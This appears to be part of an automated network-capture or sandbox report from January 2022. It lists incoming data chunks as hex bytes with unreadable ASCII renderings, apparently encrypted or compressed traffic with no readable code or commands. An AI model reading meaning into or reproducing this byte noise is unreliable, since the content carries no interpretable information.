                                                                                              2022-01-28 18:02:46 UTC675INData Raw: 58 0a 1a 16 fe 54 60 75 34 68 b7 6c 3e d2 dd e3 3d 15 15 81 c0 18 47 ee 27 6a 7f ae fd 10 0a 6d b1 46 de 45 eb 7e c6 ba 60 d7 d5 b6 c8 bf c8 ce fb 93 ec f1 06 fb f2 75 57 89 01 ee 3a a5 d2 8b c1 d5 7c 78 79 b2 b9 ff 2a f9 60 c0 f8 93 e6 84 88 3a f1 0d a3 ae 70 95 42 2a 0b 28 0f 43 d8 e2 e0 e4 4a 5d 90 26 d1 76 64 25 a1 04 e3 da 46 c2 d4 9a 47 bc e8 38 55 83 d4 3c c8 91 8a 88 4f e7 17 7a 40 5d e7 80 28 3e 68 d5 d0 22 e4 05 c6 2c 7b 49 ff 58 a6 58 62 08 ed ad 40 21 1f 20 ec 48 1a 23 ba a6 80 26 3b 2a 55 79 1f 2d 5c 52 0b f8 59 d2 eb ce 24 9f 97 aa c8 c3 e9 36 ba dd 81 e4 f5 76 52 a3 3d fe 2b a9 57 7d 1e 90 48 dd 8a ec 3d 20 3d 3d b1 e0 05 6a 33 e8 7b fe 69 c1 14 c3 c0 4c 9c fb 0d 29 94 33 12 04 29 50 81 58 d0 12 6f 2d 9e bd 9d 87 aa 6e cc 5c af 27 1b 18 f6
                                                                                              Data Ascii: XT`u4hl>=G'jmFE~`uW:|xy*`:pB*(CJ]&vd%FG8U<Oz@](>h",{IXXb@! H#&;*Uy-\RY$6vR=+W}H= ==j3{iL)3)PXo-n\'
                                                                                              2022-01-28 18:02:46 UTC679INData Raw: bb 7d 98 27 a4 8c f9 dd dd 56 c4 14 ba b4 83 46 2e 55 96 74 81 de bb 5a 9e 08 f2 f5 af ad 2c 44 20 35 0a 58 6c ed 1f bc 36 41 ba e8 e3 b9 26 fa 28 e5 9a 6d dd 9b 18 af ca ee 01 9c e7 8b 72 50 0d a3 23 ae 82 65 c8 3b 72 09 47 0c de 53 97 b9 a5 75 3f a6 4b c4 d3 45 2a cf 04 ea 30 9b 17 fd 62 18 86 b1 8d 6c f6 44 d0 eb d5 ad 09 d7 e0 11 b9 27 80 27 53 fd ce 82 b5 26 24 7f f0 4c 4d 63 40 74 00 df ae ca 3d 23 d6 43 c5 7a 7e 66 94 19 d9 09 70 ac 88 bf 97 25 af 74 0a bf 67 ae 8a 06 3a 5b 35 e6 3a 44 aa 86 57 e9 70 62 26 f8 29 f6 3d 82 f8 36 c7 72 2c 02 e0 20 4d 2a 11 5f ee 17 2a 55 2d 90 4e 98 14 5a be fa 99 c0 ed 81 9f 6a ed ec 37 25 c3 1b 75 cb 89 db e9 fd d3 02 a1 0b c4 65 1c f8 2f da 6f e3 e0 09 e3 55 66 be a3 74 18 d9 19 d7 a2 f9 63 cf da f0 e1 3a 3d e3 80
                                                                                              Data Ascii: }'VF.UtZ,D 5Xl6A&(mrP#e;rGSu?KE*0blD''S&$LMc@t=#Cz~fp%tg:[5:DWpb&)=6r, M*_*U-NZj7%ue/oUftc:=
                                                                                              2022-01-28 18:02:46 UTC683INData Raw: 78 88 09 09 69 ff 5d 52 9b 57 03 39 3a 5a cb c3 0c 15 18 cd 34 15 f3 76 63 e0 bd d6 eb eb 7a 27 05 76 75 c3 34 90 ac d8 68 94 18 df 10 42 9e 1c 4b 3d e4 b7 6c bc e2 ca b4 b5 18 bc 33 23 02 4c 52 65 fb 34 d0 a2 d0 e2 f2 03 a5 16 25 62 7d 70 05 8a d3 7a 5b ac da 92 0a 67 d3 7f 36 7c 1b a4 4b 7b c1 49 03 14 6c 2a 1b c3 5d 60 84 e4 03 79 93 5e 8e 69 af 0f 11 05 02 10 77 68 b9 31 00 d2 47 1c 2f 6d d7 4d 91 05 40 31 da 8d 41 43 7f 71 ce 46 eb 95 b1 0b f7 2c 9b ce d4 d6 6a ce fa 74 a2 4e 05 a9 ec 3c 1a fc 2c 75 6a 5a b3 f7 16 15 e4 d8 62 c6 c1 94 44 39 90 ae be 7d d9 5d 9d 51 eb 2d 94 33 b1 a3 ab 04 75 d3 8d 92 81 19 eb 02 02 61 ba 0b ba 41 9c d8 06 cc c5 73 4b a1 d4 45 60 5d f8 37 90 a1 e9 0c 43 86 96 bf f9 4d 26 20 56 36 0c 39 2f 7f 1b 7f 0d a4 3f 89 8e 95 64
                                                                                              Data Ascii: xi]RW9:Z4vcz'vu4hBK=l3#LRe4%b}pz[g6|K{Il*]`y^iwh1G/mM@1ACqF,jtN<,ujZbD9}]Q-3uaAsKE`]7CM& V69/?d
                                                                                              2022-01-28 18:02:46 UTC687INData Raw: b0 4d 92 9d 71 fb 2a 52 58 9c 78 47 f8 10 c7 f4 9a 14 4d 83 55 22 7e 45 da bf 6c fb a6 82 80 e6 4c 80 c8 dc 27 10 76 97 46 ed 91 45 47 3b d9 9b 26 70 69 c5 62 3a 7b e9 bf b5 08 ed 72 de ae 64 8b 59 b5 59 13 00 96 2a 8c e7 bb bb df e5 f5 a8 92 96 e5 74 67 f9 6c 34 59 d9 76 c6 ef b4 bc e7 9f 89 9e d9 34 fe 14 1b 3e 82 de 37 32 8e 7c 8c 1b 7d ee ee 6e dd 98 c9 e1 9a 05 15 a8 3d 12 7f 37 e8 d7 66 21 87 e8 5a 63 3e 16 94 53 76 94 fa f0 ac 49 c1 01 1a 98 80 7a a1 1c 9c d4 a1 a7 30 53 4f bc 09 ad a7 d2 2c 65 9b dd b3 47 b1 85 11 a9 7c d2 e9 f8 a8 ac 8d 59 90 4a 0e 47 30 e1 bb 27 04 1f bf 56 ab 60 51 61 f2 8e 9b 99 4f b1 49 2c 2e 57 fd 42 7f 0a b3 a7 0e 73 d6 75 6c c0 27 2d b4 75 15 73 3d 76 79 6c 7c 3d e3 41 5c 41 02 49 df 06 fb 23 01 bd e3 50 97 8b 1d 3a cd 10
                                                                                              Data Ascii: Mq*RXxGMU"~ElL'vFEG;&pib:{rdYY*tgl4Yv4>72|}n=7f!Zc>SvIz0SO,eG|YJG0'V`QaOI,.WBsul'-us=vyl|=A\AI#P:
                                                                                              2022-01-28 18:02:46 UTC690INData Raw: 8c 34 55 17 28 ae 06 f6 3d 01 8d 3c 0c 99 78 5d 1c 28 25 7e 26 a5 da 19 b8 33 0d 7a 61 2a 78 99 42 ff 06 3c 41 8f 82 90 14 bc 4a 47 83 a2 35 bc f2 c7 3d 29 a8 0a d9 53 8e b6 86 8f 4d 58 92 47 2c 8d 36 bd 8d c0 18 f8 72 fa e5 ad e4 06 a0 18 a0 f1 91 3b 1c e5 d4 86 51 b7 c1 12 ac 91 17 f3 28 a6 93 79 7e 52 fe 01 ee 4e 1e b9 13 84 18 13 61 7e 18 a4 4b f6 5d b7 42 c8 93 eb d8 85 3f 5f fc 3d bc 27 a7 0a 56 36 fd 05 0a 71 d8 34 f9 41 38 9d 33 07 31 41 1c 40 be c8 52 f6 7b 7f 19 9b a9 d2 78 76 9f 3e df a9 82 71 c1 0e 8d 2f 82 bd 52 2f 93 8a fa 7c 3e 90 a6 e1 9e fc 4d 22 99 1f 91 b7 49 cf ac 67 3e b2 a8 21 26 eb 25 36 6e 11 b5 31 b5 67 e6 39 72 df d9 5d a1 f9 49 98 ea d9 92 b8 85 fe 72 88 86 d0 0c c5 6b 85 83 ca b0 ad b9 bc 8d f1 5e 96 60 12 97 28 c4 97 9a 2a 8a
                                                                                              Data Ascii: 4U(=<x](%~&3za*xB<AJG5=)SMXG,6r;Q(y~RNa~K]B?_='V6q4A831A@R{xv>q/R/|>M"Ig>!&%6n1g9r]Irk^`(*
                                                                                              2022-01-28 18:02:46 UTC694INData Raw: 02 e9 52 59 4a 9e 9c 42 1f dc 6b a1 7c 63 bc 77 ad 73 f0 42 02 58 40 85 82 e5 d5 d3 5d 6a aa 12 4c 04 8e 5e 6c 38 ae cb 12 00 30 5a 49 c2 b0 06 44 e4 fc 75 e9 80 0b 2d 3d 6f 60 8d 9b 62 41 c9 bc 2f 11 5a 6a 18 de c3 83 5d 4c 2e 32 c3 9c 14 8a ca d3 4f 02 31 53 4a 6c cb 27 9d 17 53 f3 e0 24 10 c5 18 ea 70 85 55 7c 63 4b fb 22 b3 fa cb b9 cb 53 48 a1 cc 6d f6 a4 24 7c 6d f8 1e 13 e7 04 fb 32 47 8a d5 12 08 a1 01 8f 25 f8 f6 a9 d9 40 52 9e 42 74 00 03 50 b6 72 3c 6d 81 7f 06 f4 e2 7e 8c 4a 5b e6 65 9a 8d 7e 37 57 c1 b7 8a 69 bf 2e 18 d4 d5 0c ea 71 1a 78 18 2c eb 12 bb f6 6c c3 6a b3 07 ba e3 bf 70 e1 15 8b 5d 90 08 42 be b6 8b 7b fe 80 c9 47 01 0f 14 3d 57 e5 86 0e c8 d4 31 02 d4 40 68 09 b1 96 fe 99 79 20 37 47 74 9e 89 dd 46 ec 4f 80 d7 24 00 d4 ce 51 a3
                                                                                              Data Ascii: RYJBk|cwsBX@]jL^l80ZIDu-=o`bA/Zj]L.2O1SJl'S$pU|cK"SHm$|m2G%@RBtPr<m~J[e~7Wi.qx,ljp]B{G=W1@hy 7GtFO$Q
                                                                                              2022-01-28 18:02:46 UTC699INData Raw: bf ff 43 b1 68 19 37 1c 53 68 96 6a d5 bf b1 da 86 b8 78 fc ae e6 f0 71 0f 5e 17 b7 2b 05 5d 1e cd 4d cc 36 69 e0 62 50 7a 15 91 66 03 80 8f 7f 8f f3 a4 72 63 97 d3 2b c3 88 18 92 ab 73 af cc cb ba d3 f0 47 5a 22 dc a7 57 f7 80 ec 53 13 11 a8 af 4b 10 48 5b 8c 14 db 68 70 97 50 9d 65 bd 4e 2b 45 8a 99 a3 22 b6 87 eb 43 fd 02 57 0a 5c 96 98 85 8f e0 f7 20 08 f9 d0 6f ee 53 33 65 d8 ef c8 bd 89 4d 16 85 ee 44 3b 7f c6 a5 7d 07 8a 48 d3 d0 df 43 48 d5 22 cc 8c ac b0 dc 53 ee 2b 6c a1 96 79 a2 5d bc 19 9c 9d be c4 07 99 17 57 fc 5b de 16 47 1c cd 8c d2 e3 35 2a 5e 08 e6 9b 8e 61 8e 82 74 52 4f db a5 c7 c4 0f 46 83 0f f8 b0 61 1f 0b f1 d5 8c 8b 2f 10 2a fe 49 ea 26 bc 95 4f e5 bc 52 76 5e 8a bc 3f f5 ca 7b fa e5 1b 3c 8a 94 b2 04 d0 01 5e 18 89 8f af 54 a6 8d
                                                                                              Data Ascii: Ch7Shjxq^+]M6ibPzfrc+sGZ"WSKH[hpPeN+E"CW\ oS3eMD;}HCH"S+ly]W[G5*^atROFa/*I&ORv^?{<^T
                                                                                              2022-01-28 18:02:46 UTC703INData Raw: 06 5b cc d7 fa c8 ea bc 3b c5 f6 a0 85 ef 8b 1a 40 74 d7 02 8e f5 68 eb 7b 11 08 17 8c de 88 e0 2a 6a e5 18 84 cc 84 68 79 46 25 f4 6f 80 c6 68 b4 33 4b 85 b7 ba 78 d2 91 f5 ed ff 3e 85 18 9f e4 b7 46 75 03 1d 09 61 f6 fb 27 12 8a 2c 0a 5a 9c c6 2e df ed a8 7f 6d a8 6a 59 36 56 55 47 9d a5 9d f3 7b 93 6f 11 51 b9 97 bd ac c5 f3 7c 80 3e d4 2d 2e b4 eb 07 e7 b9 42 b5 90 08 21 2a 9b 1e 41 75 5c a4 7f d4 a7 8f 17 d6 07 e5 fb ec a4 38 14 a3 5e a4 f4 75 1c 84 62 41 e1 47 09 ce d7 ab b0 27 0e 6f 12 0d 4a 40 f0 bc bf 1c 93 03 51 7e fd 6b 29 98 58 59 be 7b 66 83 2e 05 ff 3e c7 6f 9b 0f 5d f6 e5 7a fd 36 93 a5 12 ce 09 d3 cb 36 af b0 8b 70 b9 1a 9d 9f af 0c 2d a9 11 7f 32 da 78 ee af d8 da 1f 34 02 2e 03 c0 1b 67 b0 1a 24 25 51 43 7b 0f 21 14 74 c7 a7 38 c6 ea c6
                                                                                              Data Ascii: [;@th{*jhyF%oh3Kx>Fua',Z.mjY6VUG{oQ|>-.B!*Au\8^ubAG'oJ@Q~k)XY{f.>o]z66p-2x4.g$%QC{!t8
                                                                                              2022-01-28 18:02:46 UTC707INData Raw: 5d 13 26 eb d5 9f 7a 29 31 e7 63 ed 81 6f da de e0 cf f6 6f 97 3c 2c c8 4c f9 47 63 b6 98 11 c1 8e a9 3c 15 90 bd 17 ef 8b 87 4b 31 a8 dc 0c 34 b5 9b 87 af 4e 47 dd e0 6c 72 3b 5e 20 8e c9 87 8d f2 fa ec fa 3e 17 31 ee ed 3b 22 42 59 b1 23 d6 56 cd 94 e5 36 2c 0d bb 95 f2 47 9b 66 9b 3f 93 5c df e5 28 2c 38 03 3e 29 cc 7a aa 78 c8 33 ea 29 79 d6 a8 53 ed 1e 1b a7 c2 91 3e 66 e8 d0 03 3d 90 26 dc 29 ef 07 06 0c b8 cc 4f 87 a5 80 d2 de e4 0d 99 25 06 f9 e6 f9 8b 51 9f 9b f8 10 c7 a5 9f 49 eb 04 0c 6b 5c 81 55 e7 38 68 1d 60 6b f4 13 56 80 fd 25 8e a6 3e 68 a5 66 bc 88 f4 45 6c 8a cd 04 4b 2a 42 a7 2c 47 fc 56 4e 4a 28 6c 91 46 43 a2 82 a7 09 e3 43 db dc 5b 68 06 fe b1 9a 1c 16 b2 97 08 6a 7d 0c 4f 98 a0 01 bc a4 11 62 d8 15 e3 ed 82 6d 2a c4 a1 f7 0a 06 08
                                                                                              Data Ascii: ]&z)1coo<,LGc<K14NGlr;^ >1;"BY#V6,Gf?\(,8>)zx3)yS>f=&)O%QIk\U8h`kV%>hfElK*B,GVNJ(lFCC[hj}Obm*
                                                                                              2022-01-28 18:02:46 UTC711INData Raw: 34 6f b7 de 04 02 27 f4 9c e3 e0 f1 ca 7d cf d4 29 22 d5 53 73 e7 c1 5f 6e 22 dd 66 4d 37 53 d1 cb b5 dc 73 a7 54 94 aa 8b 70 83 4a 40 a2 19 62 c7 53 7b 0d fc 2b 84 53 82 43 50 14 5d d0 cd ae 28 9d 8e 25 a1 cc c5 92 f9 b3 7c e0 49 23 e8 0a d7 89 73 a5 d6 ff 7e 50 3a b2 b5 5d 2a 3d a5 06 29 e5 c9 d3 84 91 bc 1c d7 3b 02 ad 83 b1 69 2b 78 f4 2b 77 5d ec 97 18 6f 10 f3 c9 4e 03 b3 05 17 05 8c df 1d 0d f9 5f d3 5c 4d 38 c1 f4 0a 5c 2b c1 ef 75 87 5c a4 e0 21 a0 2e 7a f0 ee 54 07 67 f5 5a 6b 04 a9 76 f7 0b bc 62 09 54 ee d6 cd d4 b6 69 14 31 e9 95 18 17 ba c0 82 31 cb 05 c3 a1 4a 8e fa 82 06 8c 37 c6 00 01 1d b5 2d 88 ba 05 92 41 45 eb a1 21 8f 0e 5e 9c 54 87 75 96 a5 35 46 3d 03 49 b7 d0 8a 94 09 4e 30 26 de 0a a6 23 7a 32 81 a4 a6 32 ab e8 32 22 ff fe ee e5
                                                                                              Data Ascii: 4o'})"Ss_n"fM7SsTpJ@bS{+SCP](%|I#s~P:]*=);i+x+w]oN_\M8\+u\!.zTgZkvbTi11J7-AE!^Tu5F=IN0&#z222"
                                                                                              2022-01-28 18:02:46 UTC715INData Raw: 2d 94 e5 0c 38 9c 42 6b 74 f7 56 c3 30 60 94 fe 49 2f a1 c9 4f b1 d9 cc e3 6b e0 90 06 43 ba 7d 1c 3c 69 18 c4 05 f7 cc 04 44 96 b2 c5 6a df d3 2a b5 24 b6 b6 be 34 b3 45 ff 02 43 8b 09 de e3 28 b4 4f 93 b4 f0 a1 89 0a c8 91 a0 01 bd 96 e4 c2 1e af 1f e5 da 80 25 29 93 3b bb 6d 36 8d 25 06 63 7f 0e 57 39 3a a0 55 c1 b1 25 8f 06 ce 9f 37 c5 57 e5 78 93 b4 e0 cc 5b a6 92 dc 7d 4e e9 82 70 4a 27 ab 77 1f 94 30 ce 48 5c 03 02 8c 8b e9 c0 c2 a8 dd 7d aa 90 63 f3 9c 22 8b 6d 96 1e bd 4f 18 cc e6 19 b5 0c 8f 1e ee bb ef 58 f5 8a 25 e3 29 52 55 aa c2 b0 61 5b 47 ac fd 54 45 28 9d 55 94 0b d5 92 9f 87 55 64 6b b2 42 a4 d4 8c 5d 66 2a b1 26 ad 34 f8 01 b9 7f fc 5a 36 5e c5 ee a2 2c 57 99 31 00 43 ef a0 01 06 e3 5a cc 34 6e 3d 24 01 54 8c 13 4f 02 24 9b 3a 94 3b ad
                                                                                              Data Ascii: -8BktV0`I/OkC}<iDj*$4EC(O%);m6%cW9:U%7Wx[}NpJ'w0H\}c"mOX%)RUa[GTE(UUdkB]f*&4Z6^,W1CZ4n=$TO$:;
                                                                                              2022-01-28 18:02:46 UTC719INData Raw: 18 c7 01 8e cc 6b e1 4f 7e a8 bb ac af 6f 8c 66 a0 ce ac 18 39 a4 af d7 4c 6d b1 4d d1 fc 19 74 f2 f2 8d fe 47 df d5 db 59 13 b5 37 87 02 fe 20 cd ed cd df e2 42 10 40 13 24 36 30 56 69 08 a9 4c 1e 4e 44 24 49 34 97 17 be 8c fb 67 10 16 6a 59 d8 51 9d a7 67 a2 f3 2a 02 46 b2 6c e9 08 cc 5a 1e 88 9b bb f0 f0 ae 8e 7a a5 b4 41 84 6a 05 16 96 eb 6f e9 35 44 cc 34 94 51 7c fe 92 0b d0 d5 51 13 e9 21 9e a7 b3 ec 37 ff 7c 76 0b 13 e5 88 2d 74 fa 89 db 10 27 c6 4a 80 ee 92 ca 96 ed 30 8d 27 78 ce 73 37 a5 86 f5 3c cd 90 3b 6d 5e 18 2c 51 59 20 c2 77 2d aa bf f0 aa d6 5b 0a d2 de 2d 82 db 6f bf da fd bb a6 dd 7a 34 ea d8 b8 ae 4c 18 ce d1 e6 a9 28 73 ee 79 02 b8 34 bb b3 6a da ed a7 74 43 6c 1e f3 0e f7 b7 68 e6 42 a1 b3 21 c8 9d cd 51 a9 84 92 b7 fb 4f 95 24 ce
                                                                                              Data Ascii: kO~of9LmMtGY7 B@$60ViLND$I4gjYQg*FlZzAjo5D4Q|Q!7|v-t'J0'xs7<;m^,QY w-[-oz4L(sy4jtClhB!QO$
                                                                                              2022-01-28 18:02:46 UTC722INData Raw: 2b 78 89 4f cb 64 bb eb df 75 aa 2e 43 5a fb 26 95 49 b2 d2 30 55 b1 a7 ad 49 c1 52 3b 53 6c db 9a 92 c8 28 09 8e c8 ba 7d 1a 71 57 a4 49 02 54 f2 18 51 0e 91 2e 38 1a cd 3c 5f 35 0b de f7 e1 90 a3 77 d8 eb f5 0c 71 12 fe 71 c0 3d 59 66 2d 0e 31 dc dd 01 11 73 74 87 7b d2 4a 9c f7 10 7d dc 61 45 68 3e 7e 08 3a 2b 61 61 46 db bb 3f 6f be f2 40 c0 e8 a1 b1 05 9b 0e 92 79 03 6d c6 ae 0f 19 85 83 21 18 d9 41 d9 2c c3 f7 8a 34 22 35 d0 6b 04 6b f1 19 e1 85 5c f7 62 b8 18 71 77 e1 56 9a 46 5a f2 26 7a 6b 80 3a 66 2e df f4 d7 ea 26 0e 5b ca e0 e3 ab 06 0f 30 bd e4 ab 68 60 f4 c1 8e c4 54 8d a0 65 14 8b e9 96 b2 c8 0f d4 94 82 33 6f 2e 0c 6f 12 b7 cc c2 29 bc 7e a4 18 35 dd bf 6f e3 48 75 4f 3e a3 0a 8c eb d6 61 dc 3c 0f ab 39 97 54 27 62 f1 0e cc b5 ef 99 70 ab
                                                                                              Data Ascii: +xOdu.CZ&I0UIR;Sl(}qWITQ.8<_5wqq=Yf-1st{J}aEh>~:+aaF?o@ym!A,4"5kk\bqwVFZ&zk:f.&[0h`Te3o.o)~5oHuO>a<9T'bp
                                                                                              2022-01-28 18:02:46 UTC726INData Raw: 33 b8 16 bf 69 b6 ff 16 05 41 a8 61 9c a0 42 ce 2a 5a 90 6e 58 31 cb 14 70 35 d8 c9 ac 19 37 f3 af 78 9b be 57 35 e4 cf 68 52 33 fa 8c 3b eb fc a5 e9 d8 dc 3c 77 42 be 92 1d c2 c0 2e 50 a3 f4 7d 2a 5b 8a d0 18 a8 04 a0 92 a2 35 b2 80 08 e1 91 ae 88 ca f3 9c 14 d0 11 be aa e4 ff c9 b8 a1 90 a7 dc ba 81 ad 00 5b 7f f9 a4 6f ff 8a 79 1e 30 09 d6 6d 9c a4 8a 48 82 a0 38 ba 7f 6f f6 37 68 89 58 2d c2 9e fd fe b0 10 4b 70 1d bb d0 dd e4 d0 1a 99 c1 95 08 b3 e9 6f c5 8a 81 d9 ca 98 ff 14 1a dd b5 fa e1 5a f0 60 37 bc 4a 94 b6 2e c8 6d e6 c5 ec 4d da 63 cd c4 10 2a a5 35 2b a0 4b 17 00 8e f3 c3 b1 00 6e b7 47 31 4f 76 17 a7 9f 27 78 ba cb c6 f3 e5 73 e1 95 e0 e4 4d ff 5c 5e aa f9 c6 4b 38 d2 42 ee 09 f6 ae f7 5f 34 f4 9c f9 dd 99 3a c3 18 73 73 55 78 c4 54 29 33
                                                                                              Data Ascii: 3iAaB*ZnX1p57xW5hR3;<wB.P}*[5[oy0mH8o7hX-KpoZ`7J.mMc*5+KnG1Ov'xsM\^K8B_4:ssUxT)3
                                                                                              2022-01-28 18:02:46 UTC731INData Raw: 3e 5e cd 19 9c 49 17 bf 46 af 1d c8 dd fc 63 33 de 62 d7 e5 a8 f9 db eb b7 42 85 de 16 34 61 21 b0 ce ed dc 11 ee 3f 8f cb 04 e6 5d 4a ba b9 53 31 b0 a0 1b a1 98 62 a1 f9 b5 2d 86 34 44 8a 50 a9 61 55 5f 50 dd 93 b4 aa e2 20 4b 1c 53 31 b6 af 3d f8 2d cf 01 5e ac 95 b3 27 b2 a5 62 d7 f2 49 37 e9 d6 01 37 e9 de 16 75 88 4f 26 53 31 90 4e bd 41 6c f1 a8 8b a8 8b b2 a5 71 7e 7a 15 e7 ad 76 0b 17 97 83 ac b5 2d aa 90 3e 7b e1 9e 05 68 c7 5b 31 d9 e7 ad 79 92 3a 70 89 bc de 16 62 d7 a4 81 c3 51 45 0d 11 87 d7 84 59 40 ee 3f b4 aa 8f cb 01 5e a8 8b aa 90 2d cf 00 db e2 20 0e ff 98 62 be c4 f3 cc 91 d0 93 d5 0d 7d ef c2 af 1d 86 34 04 e6 4d 21 d1 75 fb e1 be c4 a1 f9 b4 aa b0 a0 03 63 34 61 34 61 3c 76 79 92 32 5c 9e 71 61 55 45 0d 19 9c 02 e1 eb b7 5d 4a f8 59
                                                                                              Data Ascii: >^IFc3bB4a!?]JS1b-4DPaU_P KS1=-^'bI77uO&S1NAlq~zv->{h[1y:pbQEY@?^- b}4M!uc4a4a<vy2\qaUE]JY
                                                                                              2022-01-28 18:02:46 UTC735INData Raw: 2c 4c da 0c ef c2 bc bf 29 c5 24 38 19 9c 09 73 a3 fe 1c 23 db 8e 29 c5 3f fd 94 58 df 99 93 d5 5f 50 cd 6a 89 bc cb 65 3c 76 6e f6 24 38 13 8c 26 3d 96 5d 1f ab 0b 78 74 06 8e 48 e0 1b d3 7a 7a 15 e1 9e 01 5e b8 b4 d9 89 9c 6c 85 b1 4d 21 de 16 34 61 3b f3 a3 fe 01 5e b9 37 88 39 9c 6c 94 58 ce ed f2 49 00 db eb b7 42 85 c8 dd e7 ad 38 6b 1a 1e 46 8f aa 90 27 c0 bb 3c 17 97 96 5d 6a ec 5e cd 03 63 36 66 83 ac e3 a3 90 4e ed bd 55 36 12 0a 9b ea 50 a9 63 5a b6 af 7a 15 e3 a3 9f f4 6f 79 f6 54 da 0c 96 5d 2b ca 95 da 62 d7 cd 6a fc 63 2d cf 00 db e2 20 48 94 2a 47 77 8d b0 a0 18 19 bc bf 32 5c a6 86 55 36 0f 82 58 be a5 03 35 e4 35 e4 0c fa 2d cf 4a 9a 4f 26 1d a6 e3 a3 8e 48 ed bd 35 e4 05 68 88 39 9a 67 0a f5 b8 b4 8a 3e 52 ae e8 30 72 00 f3 cc c8 dd f6
                                                                                              Data Ascii: ,L)$8s#)?X_Pje<vn$8&=]xtHzz^lM!4a;^79lXIB8kF'<]j^c6fNU6PcZzoyT]+bjc- H*Gw2\U6X55-JO&H5h9g>R0r
                                                                                              2022-01-28 18:02:46 UTC739INData Raw: 21 85 c3 64 80 11 c1 7e 2f e1 84 1a 1a 2a a9 3a a8 bf 84 1b 0d 49 81 93 55 02 8b f5 85 85 8f ff c3 65 49 23 b9 03 62 e4 d4 cf b4 99 20 1d 09 40 19 af 9e 42 e8 03 37 da 32 6f 51 1f b9 05 94 6a 0a c7 8b f3 76 39 4a a8 05 5a bb 0e 9d dd df ab 25 88 19 ae 91 e1 6a dd 4d 10 cd 5b f7 e7 31 e8 b6 9e 05 59 2a 76 54 82 65 6e cf 5e ee 0e f2 79 65 6f 98 52 65 6f cb 55 aa a0 f1 f7 a6 b6 f5 e1 da 3c 58 8e 50 99 e7 ad 18 18 89 bc be 24 38 54 5f 6f af 22 f3 f3 66 dd 07 52 d0 cd 02 de 44 b5 11 b8 92 6c e5 97 ea 0b 87 88 d6 3f 24 06 28 7c b7 0c 6d 4a 1b 9f 9f ca b1 1c 1f 95 fc 5d 5a fe 92 6e 12 37 27 fd 5e f0 e6 16 98 5f 26 00 bb 01 14 32 68 da 2e 6f 61 68 ea 09 8e 74 e1 a2 ad 24 83 90 eb 8b 4e 98 1b 9d 8f f7 9c 50 9d d3 64 e0 13 b7 c0 f2 95 e1 58 85 01 65 c5 6d f0 7f cc
                                                                                              Data Ascii: !d~/*:IUeI#b @B72oQjv9JZ%jM[1Y*vTen^yeoReoU<XP$8T_o"fRDl?$(|mJ]Zn7'^_&2h.oaht$NPdXem
                                                                                              2022-01-28 18:02:46 UTC743INData Raw: 13 cc dc e1 aa 41 36 fd d2 e9 81 0a c6 c5 64 10 37 7c 28 3a 42 82 1b 50 98 dc 20 b9 06 df a8 88 09 a9 3e c6 e8 9b da 8f fb bf 76 14 3f fc 63 5a c3 2d cf 6e d6 01 61 cd 55 4d 1e 1f 94 45 33 36 58 75 b6 2b f4 21 8e 77 b3 05 56 a8 b6 da 30 bf 7a be f8 0e c3 40 bb 6d 4f 10 3f 06 d1 bb 06 65 65 2e 6b 94 61 b1 1b 0a cc 6a d5 23 8c 4c a7 ae a3 ab 2b 8d fe 56 8f 24 0f 15 a6 ca d4 cf 58 b8 82 c3 67 fe 5e 49 22 fb d4 51 19 c5 63 57 0f 74 32 b3 13 27 f4 33 ed 6c c2 6b 5d 11 b5 fb d3 e3 91 e2 12 0d 4c 6a dd 48 a5 bb 0d 43 38 c7 6b c9 50 3c 46 07 5d 31 d9 89 bc 37 e9 b3 37 e9 8d bf 79 e0 24 63 64 dc 2c bd 7c f8 64 70 c6 70 c6 7c 27 60 ef 5e f0 dc 2c d8 3a e0 26 b1 1f 2f e9 d6 3c 22 0e af 20 62 ea 7d a0 33 e3 e3 9e 4d 1c 1b 9c 58 83 80 19 90 72 fc 5f a8 b7 c6 e4 d5 43
                                                                                              Data Ascii: A6d7|(:BP >v?cZ-naUME36Xu+!wV0z@mO?ee.kaj#L+V$Xg^I"QcWt2'3lk]LjHC8kP<F]177y$cd,|dpp|'`^,:&/<" b}3MXr_C
                                                                                              2022-01-28 18:02:46 UTC747INData Raw: 3a 41 48 a5 41 33 e4 14 3d c9 4a ab 31 e8 2a 76 19 ad 12 3b f1 f7 2c 7c e8 00 31 e9 50 99 3f cd b8 84 e5 98 a0 47 a8 bb 8e 78 ba 89 1e 18 83 9c fe 58 34 51 ae ab 69 59 32 6c 9b da 6e c6 82 1a 4c af 57 0b 3a 40 b0 90 6d 44 9d df 93 d5 7f a1 1d a6 86 54 b3 27 c0 f6 ac aa 7b a7 d6 3e b7 0d ba 86 9d d0 6d 4b 8d f9 5e f2 3d c7 3f c2 85 8e 0e c0 f1 f8 69 56 b8 8a c6 e6 cf 51 f5 ef 0d 43 b9 09 0c c4 99 db cc d6 3b cd 58 80 0e c1 69 57 21 8e 58 83 53 0c 10 38 a8 b6 16 29 68 da a8 b6 34 5c 49 2a 3a 4d 57 06 9b d7 e8 0d 1b 9c 0e c2 95 e7 e3 9e 4c a2 5a fe 74 3b e1 a3 f5 ed 42 b9 ea 09 e7 91 c2 f5 3a 4b de 2d 88 02 ff d1 ee 08 ab 24 6c c6 90 79 ad 2f f5 e6 26 0a f3 fa 98 54 06 dd df af 58 88 14 39 f7 e0 14 3b 91 e4 65 6c 03 50 71 4d 9b d9 15 a0 ca d2 5a f2 60 d2 f7
                                                                                              Data Ascii: :AHA3=J1*v;,|1P?GxX4QiY2lnLW:@mDT'{>mK^=?iVQC;XiW!XS8)h4\I*:MWLZt;B:K-$ly/&TX9;elPqMZ`
                                                                                              2022-01-28 18:02:46 UTC751INData Raw: 98 67 41 7c 1a 1b 84 43 08 f5 f4 15 91 d5 5a 87 b6 aa b5 1d a6 83 89 a2 7c 1f 8e 44 8a 3b d7 7e 1f ae bf ae 9b ef e6 f7 d6 04 c2 1e 28 47 36 dc 11 82 0e 5b 45 08 d4 68 e7 a8 af 61 55 33 fa 3a 70 fe 4c d1 75 8d e2 60 d2 f2 6d 52 ae 9e 55 20 2e 57 1f a3 fe 6d 57 c7 5b 40 a3 12 0a f0 67 ba b9 32 7f 60 d2 f2 6a 46 8f ce ce 7f a2 79 b1 58 be c4 d3 7a 15 91 d0 f2 49 17 97 e0 1b a1 f9 db 8e 48 94 58 be c1 68 83 ac 90 63 d0 f2 49 17 97 e0 1b a1 f9 db 8e 48 94 58 bb 1f eb b7 37 c5 be c4 d3 7a 15 91 d0 f2 49 17 97 e0 1b a1 fc 40 b8 b4 af 31 13 8c 43 08 f0 44 8a 3e 7b 98 62 d7 84 2f d1 56 88 39 eb 9b 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 89 9f ec 3a 75 a4 df 99 e5 a8 8b c1 